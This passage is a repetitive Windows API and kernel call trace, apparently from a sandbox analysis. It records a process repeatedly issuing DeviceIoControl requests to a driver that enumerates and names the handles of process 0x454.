lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe6, lpOverlapped=0x0) returned 1 [0245.351] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.351] PsAcquireProcessExitSynchronization () returned 0x0 [0245.351] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.351] ObReferenceObjectByHandle (in: Handle=0x5a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001fa4160, HandleInformation=0x0) returned 0x0 [0245.351] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.351] PsReleaseProcessExitSynchronization () returned 0x2 [0245.351] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.352] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.352] ObfDereferenceObject (Object=0xfffffa8001fa4160) returned 0x1 [0245.352] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.352] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.352] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.352] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.352] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.352] PsAcquireProcessExitSynchronization () returned 0x0 [0245.352] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.352] ObReferenceObjectByHandle (in: Handle=0x5ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0017bd4c0, HandleInformation=0x0) returned 0x0 [0245.352] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.352] PsReleaseProcessExitSynchronization () returned 0x2 [0245.352] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.352] ObQueryNameString (in: Object=0xfffff8a0017bd4c0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.352] ObfDereferenceObject (Object=0xfffff8a0017bd4c0) returned 0x1 [0245.352] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.352] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.352] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.352] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x4c, lpOverlapped=0x0) returned 1 [0245.352] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.352] PsAcquireProcessExitSynchronization () returned 0x0 [0245.352] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.352] ObReferenceObjectByHandle (in: Handle=0x5d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000c69080, HandleInformation=0x0) returned 0x0 [0245.352] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.352] PsReleaseProcessExitSynchronization () returned 0x2 [0245.352] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.352] ObQueryNameString (in: Object=0xfffff8a000c69080, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.352] ObfDereferenceObject (Object=0xfffff8a000c69080) returned 0x3 [0245.352] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.352] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.352] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.352] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0245.353] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.353] PsAcquireProcessExitSynchronization () returned 0x0 [0245.353] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.353] ObReferenceObjectByHandle (in: Handle=0x5ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037d9630, HandleInformation=0x0) returned 0x0 [0245.353] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.353] PsReleaseProcessExitSynchronization () returned 0x2 [0245.353] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.353] ObQueryNameString (in: Object=0xfffffa80037d9630, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.353] ObfDereferenceObject (Object=0xfffffa80037d9630) returned 0x11 [0245.353] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.353] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.353] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.353] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x88, lpOverlapped=0x0) returned 1 [0245.353] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.353] PsAcquireProcessExitSynchronization () returned 0x0 [0245.353] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.353] ObReferenceObjectByHandle (in: Handle=0x5fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037872d0, HandleInformation=0x0) returned 0x0 [0245.353] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.353] PsReleaseProcessExitSynchronization () returned 0x2 [0245.353] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.353] ObQueryNameString (in: Object=0xfffffa80037872d0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.353] ObfDereferenceObject (Object=0xfffffa80037872d0) returned 0x11 [0245.353] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.353] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.353] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.353] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x88, lpOverlapped=0x0) returned 1 [0245.353] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.353] PsAcquireProcessExitSynchronization () returned 0x0 [0245.353] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.353] ObReferenceObjectByHandle (in: Handle=0x654, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003926700, HandleInformation=0x0) returned 0x0 [0245.353] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.354] PsReleaseProcessExitSynchronization () returned 0x2 [0245.354] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.354] ObQueryNameString (in: Object=0xfffffa8003926700, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.354] ObfDereferenceObject (Object=0xfffffa8003926700) returned 0x11 [0245.354] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.354] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.354] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.354] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.354] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.354] PsAcquireProcessExitSynchronization () returned 0x0 [0245.354] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.354] ObReferenceObjectByHandle (in: Handle=0x664, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80039be920, HandleInformation=0x0) returned 0x0 [0245.354] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.354] PsReleaseProcessExitSynchronization () returned 0x2 [0245.354] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.354] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.354] ObfDereferenceObject (Object=0xfffffa80039be920) returned 0x1 [0245.354] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.354] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.354] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.354] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.354] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.354] PsAcquireProcessExitSynchronization () returned 0x0 [0245.354] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.354] ObReferenceObjectByHandle (in: Handle=0x69c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003925a30, HandleInformation=0x0) returned 0x0 [0245.354] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.355] PsReleaseProcessExitSynchronization () returned 0x2 [0245.355] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.355] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c5044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030c5044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.355] ObfDereferenceObject (Object=0xfffffa8003925a30) returned 0x1 [0245.355] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.355] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.355] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.355] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.355] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.355] PsAcquireProcessExitSynchronization () returned 0x0 [0245.355] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.355] ObReferenceObjectByHandle (in: Handle=0x6ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0013f0c50, HandleInformation=0x0) returned 0x0 [0245.355] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.356] PsReleaseProcessExitSynchronization () returned 0x2 [0245.356] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.356] ObQueryNameString (in: Object=0xfffff8a0013f0c50, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.356] ObfDereferenceObject (Object=0xfffff8a0013f0c50) returned 0x2 [0245.356] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.356] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.356] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.356] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0245.356] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.356] PsAcquireProcessExitSynchronization () returned 0x0 [0245.356] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.356] ObReferenceObjectByHandle (in: Handle=0x6c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800a871dd0, HandleInformation=0x0) returned 0x0 [0245.356] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.356] PsReleaseProcessExitSynchronization () returned 0x2 [0245.356] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.356] ObQueryNameString (in: Object=0xfffffa800a871dd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.356] ObfDereferenceObject (Object=0xfffffa800a871dd0) returned 0x1 [0245.356] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.356] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.356] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.356] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0245.356] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.356] PsAcquireProcessExitSynchronization () returned 0x0 [0245.356] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.356] ObReferenceObjectByHandle (in: Handle=0x6c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a7e650, HandleInformation=0x0) returned 0x0 [0245.356] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.356] PsReleaseProcessExitSynchronization () returned 0x2 [0245.357] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.357] ObQueryNameString (in: Object=0xfffffa8003a7e650, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.357] ObfDereferenceObject (Object=0xfffffa8003a7e650) returned 0x1 [0245.357] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.357] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.357] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.357] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.357] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.357] PsAcquireProcessExitSynchronization () returned 0x0 [0245.357] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.357] ObReferenceObjectByHandle (in: Handle=0x6d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0013b6060, HandleInformation=0x0) returned 0x0 [0245.357] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.357] PsReleaseProcessExitSynchronization () returned 0x2 [0245.357] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.357] ObQueryNameString (in: Object=0xfffff8a0013b6060, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.357] ObfDereferenceObject (Object=0xfffff8a0013b6060) returned 0x1 [0245.357] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.357] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.357] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.357] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0245.357] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.357] PsAcquireProcessExitSynchronization () returned 0x0 [0245.357] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.357] ObReferenceObjectByHandle (in: Handle=0x6e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a49370, HandleInformation=0x0) returned 0x0 [0245.357] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.357] PsReleaseProcessExitSynchronization () returned 0x2 [0245.357] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.357] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.357] ObfDereferenceObject (Object=0xfffffa8003a49370) returned 0x1 [0245.357] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.357] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.358] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.358] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.358] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.358] PsAcquireProcessExitSynchronization () returned 0x0 [0245.358] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.358] ObReferenceObjectByHandle (in: Handle=0x70c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0010e1780, HandleInformation=0x0) returned 0x0 [0245.358] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.358] PsReleaseProcessExitSynchronization () returned 0x2 [0245.358] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.358] ObQueryNameString (in: Object=0xfffff8a0010e1780, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.358] ObfDereferenceObject (Object=0xfffff8a0010e1780) returned 0x1 [0245.358] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.358] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.358] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.358] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.358] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.358] PsAcquireProcessExitSynchronization () returned 0x0 [0245.358] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.358] ObReferenceObjectByHandle (in: Handle=0x718, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000f89ea0, HandleInformation=0x0) returned 0x0 [0245.358] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.358] PsReleaseProcessExitSynchronization () returned 0x2 [0245.358] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.358] ObQueryNameString (in: Object=0xfffff8a000f89ea0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.358] ObfDereferenceObject (Object=0xfffff8a000f89ea0) returned 0x1 [0245.358] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.358] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.358] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.358] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.358] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.358] PsAcquireProcessExitSynchronization () returned 0x0 [0245.358] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, 